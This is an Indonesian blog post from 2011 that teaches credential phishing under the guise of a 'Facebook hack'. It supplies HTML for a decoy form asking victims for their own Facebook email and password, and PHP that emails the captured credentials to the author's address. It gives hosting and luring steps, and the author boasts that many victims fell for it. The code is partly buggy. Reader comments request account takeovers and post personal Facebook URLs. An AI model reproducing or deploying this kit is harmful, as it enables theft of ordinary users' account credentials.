Monday, November 14, 2011

REAL ! Cara Hack Facebook Paling Mudah Dan Ampuh !

Ok Ayo D Coba  :D

Hello temen temen blogger , gimana nih kabarnya pada baik baik aja ? Hahahaha
Setelah lama gak update postingan , saya kembali nulis lagi nih kali ini saya akan share sesuatu yg unik dan menggelitik di wisata malam ! Ehh salah :D
Sesuatu yg sangat luar biasa maksutnya !

Cara hacking facebook dengan metode social enginering !
Ya tehnik social enginering atau rekayasa sosial yg pernah gua temukan adalah sebuah situs yg mengaku bisa membobol akun facebook seseorang !
Sementara itu untuk melakukan hal ini seseorang diminta untuk memasukan nama dan emailnya , passwordnya dan email atau username target !

PERHATIKAN ! Masa mau membobol facebook orang lain harus memasukan password facebook kita juga ?

Itu yg menginspirasi saya membuat dan menciptakan sendiri teknik ini !
Dengan script PHP yg saya buat sendiri ini anda bisa menipu atau mengelabui seseorang untuk mendapatkan password facebooknya !

Lihatlah gambar dibawah ini , Jika tidak percaya anda dapat mengakses situs phising yg saya buat di http://www.blacknote.hourb.com/facebook


Ini hanyalah sebuah model sederhana mungkin anda bisa lebih kreatif lagi dari saya !

Sewaktu anda menekan tombol kirim yg terjadi sebenarnya adalah anda mengirimkan sendiri semua data yg anda masukan kedalam sebuah email yg telah kita tentukan !
Sebagai tambahan trik ini akan lebih manjur , Jika anda membuatnya dengan menggunakan bahasa inggris karna si korban pasti akan lebih percaya !

Berikut email yg saya terima setelah korban mengirimkan datanya kepada saya !


Gimana berminat gak dengan teknik hacking facebook yg satu ini ?
Kebanyakan bacot yah ?
Yaudah yok daripada mastah mastah pada marah mending kita cekibrot aja ke langkah langkahnya :)

1. Copy script PHP dibawah ini kedalam notepad !

<html>
<head>
<title>Hack Facebook Teman Anda !</title>
</head>
<body bgcolor="black" text="white">
<p>
<center><center>
<center><center>

<form id="form1" name="form1" method="post" action="informasi.php">
<table width="455" border="0" cellspacing="0" cellpadding="0">
<p>
  <tr>
    <td height="45" align="right"><label for="email1">Email Facebook Anda</label></td>
    <td><input name="email1" type="text" id="email1" size="30" /></td>

  </tr>
  <tr>
    <td width="175" height="44" align="right"><label for"fb">Email Facebook Target</label></td>
    <td width="280"><input name="email2" type="text" id="email2" size="30" /></td>

  </tr>
  <tr>
    <td height="45" align="right"><label for="email1">Password Facebook Anda</label></td>
    <td><input name="fb" type="password" id="fb" size="30" /></td>


  </tr>
  <tr>
    <td height="41" align="right"><label for="info">URL Facebook Target</label></td>
    <td><textarea name="info" cols="30" rows"5" id="info"></textarea></td>

  </tr>
  <tr>
    <td height="38">&nbsp;</td>
    <td><label>
      <input type="submit" name="submit" id"=submit" value="Jika anda telah mengisi semua form diatas , Silahkan klik tombol ini untuk mendapatkan password facebook target yang akan kami kirimkan melalui pesan di facebook anda !" />
    </label></td>
  </tr>

</head>
<body bgcolor="black" text="white">
<br>Untuk membongkar password facebook teman anda , kami memerlukan informasi mengenai anda dan target orang yang facebooknya ingin anda hack<p>
<p>
Silahkan masukan data anda dan data target anda pada form pengisian dibawah ini !
</body>
<html>

2. Jika sudah , silahkan simpan filenya dengan nama facebook.php atau hackfacebook.php terserah anda yg jelas namanya  harus berkaitan dengan facebook !

3. Kembali Copy script PHP dibawah ini lalu salin kedalam notepad !

<?php

/* SILAHKAN GANTI SUBJECT DAN EMAIL ANDA SENDIRI.*/

$emailsubject = 'Korban Baru Password Facebook !';
$mailto = 'me.defacer@gmail.com';

/* Fungsi berikut untuk mengambil input field. */

#fbField = $_POST['fb'];
$email1Field = $_POST['email1'];
$email2Field = $_POST['email2'];
$infoField = $_POST ['info'];

/* Mengambil informasi untuk dikirim kepada facebook anda !. */

$body = <<<EOD
<br><hr><br>

Email Korban : $email1Field <br>
Email Target : $email2Field <br>
Password Korban : $fbField <br>
URL Target : $infoField <br>
EOD;


$headers = "From: $email1Field\r\n"; // Buat nunjukin pengirim email.
$headers .= "Content-type: text/html\r\n"; // Untuk memerintahkan server melakukan coding teks.
$success = mail($mailto, $emailSubject, $body, $headers); // Hal-hal yang akan dikirim.
?>

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
<title>Mohon tunggu - Proses pencarian password sedang dilakukan</title>
</head>
<body bgcolor="black" text="white">
Kami akan memproses permintaan anda segera.
<br>Silahkan periksa kotak masuk facebook anda untuk mendapatkan password target anda , Jika dalam waktu 24 Jam password tidak terkirim kedalam kotak masuk facebook anda hubungi kami melalui email ar10.dy@computer4u.com !<p>
<p>
Segala bentuk penyalahgunaan password yg anda peroleh dan apa yg akan terjadi kepada facebook anda , adalah diluar tanggung jawab kami !

</body>
<html>

4. Jika sudah silahkan simpan filenya dan beri nama informasi.php

5. Upload kedua file tersebut kedalam hostingan anda !

6. Berikan link agar orang lain dapat mengarah kehalaman hack facebook anda tersebut ! Dan selesai :)

Saya sendiri telah mencoba tehnik dengan menulis di status facebook kalau website tersebut bisa membongkar password facebook orang lain dan ternyata banyak juga yg terjebak :D

Saya tidak ingin berlama lama dalam postingan kali ini , Intinya adalah bagaimana anda dapat meyakinkan orang lain agar dia dapat memberikan password , informasi penting atau apapun tujuan anda !

TERAKHIR !
SEBENARNYA SEMUA TEKNIK ITU AMAN , TIDAK ADA YG BERBAHAYA ! YANG HARUS DIPERHATIKAN ADALAH SIAPA YANG MENGUASAI TEKNIK ITU ! TEKNIK JAHATPUN JIKA DIKUASAI OLEH ORANG YANG TUJUANNYA HANYA INGIN BELAJAR , PASTI AKAN MENJADI TEKNIK YG BAIK !
INTINYA SAYA HANYA INGIN MEMBERI TAU , SAYA MEMBUAT TEKNIK INI DENGAN SUSAH PAYAH ! JADI JANGAN DISALAHGUNAKAN YAH ! HEHE

HAPPY HACKING :)

7 comments:

  1. Pertama nie seru juga ngehack fb orang ??

    ReplyDelete
  2. mahu hack sila call number ni ye 0124604743

    ReplyDelete
  3. salam mas tolong dong kasih hack akaun facebooknya ini dia udah menghak
    facebook gue dan mencuri group gue,orngnya sih dari malaysia dasar banget tu orang\
    URL facebooknya ini mas https://www.facebook.com/olie.nam.7 URL group gue ini
    https://www.facebook.com/groups/sandiwaracinta saya mohon pertolongan dari mas atau mbak
    kerna berbagai cara udah gua menghack facebooknya percuma aja enggak bisa juga..
    tolong gue ya ku mohon,klu udah kasih tau gue URL facebook gun ini mas/mbak..
    https://www.facebook.com/suzie.anna.948

    ReplyDelete
  4. Cara ngapload klo gk salah pake cpanel anda gan .. coba aja

    ReplyDelete
  5. gan udah sya coba tpi pas saya kirim kok malah halaman yg ke informasinya tidak ditemukan
    pas di reload browsernya baru bisa.
    trus wktu masuk email kosong semua fiel2nya ...

    ReplyDelete

Hosting Gratis

Web hosting

Archives

shareyourthinkall searchengine portalsite download